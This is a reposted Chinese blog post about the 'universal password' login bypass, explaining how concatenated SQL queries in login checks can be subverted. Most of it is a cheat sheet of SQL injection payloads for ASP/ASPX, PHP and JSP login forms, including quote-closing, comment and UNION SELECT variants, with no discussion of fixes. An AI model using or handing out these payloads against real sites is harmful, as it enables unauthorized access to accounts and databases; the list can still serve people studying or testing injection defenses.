码迷,mamicode.com
首页 > 其他好文 > 详细

万能密码漏洞

时间:2017-08-05 15:38:31      阅读:179      评论:0      收藏:0      [点我收藏+]

标签:username   something   php   targe   name   nio   知识   blank   单引号   

漏洞原理:网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库, sql=select * from user where username=‘username‘ 
sql="select * from user where username=‘"&username&"‘and pass=‘"& pass&‘" ,

asp aspx万能密码
  1: "or "a"="a
   2: ‘)or(‘a‘=‘a
   3:or 1=1--
   4:‘or 1=1--
   5:a‘or‘ 1=1--
   6: "or 1=1--
   7:‘or‘a‘=‘a
   8: "or"="a‘=‘a
   9:‘or‘‘=‘
   10:‘or‘=‘or‘
   11: 1 or ‘1‘=‘1‘=1
   12: 1 or ‘1‘=‘1‘ or 1=1
   13: ‘OR 1=1%00
   14: "or 1=1%00
   15: ‘xor
   16: 新型万能登陆密码
   用户名 ‘ UNION Select 1,1,1 FROM admin Where ‘‘=‘ (替换表名admin)
   密码 1
   Username=-1%cf‘ union select 1,1,1 as password,1,1,1 %23
   Password=1
   17..admin‘ or ‘a‘=‘a 密码随便

 PHP万能密码
   ‘or‘=‘or‘
   ‘or 1=1/* 字符型 GPC是否开都可以使用
   User: something
   Pass: ‘ OR ‘1‘=‘1

   jsp 万能密码
   1‘or‘1‘=‘1
   admin‘ OR 1=1/*
   用户名:admin 系统存在这个用户的时候 才用得上
   密码:1‘or‘1‘=‘1

 

admin‘ or ‘a‘=‘a  与 admin‘ or 1=1--用户名应该是存在的,然后是闭合后半个单引号或者用--注释掉。

 

万能密码漏洞

标签:username   something   php   targe   name   nio   知识   blank   单引号   

原文地址:http://www.cnblogs.com/lhq8998/p/7290286.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!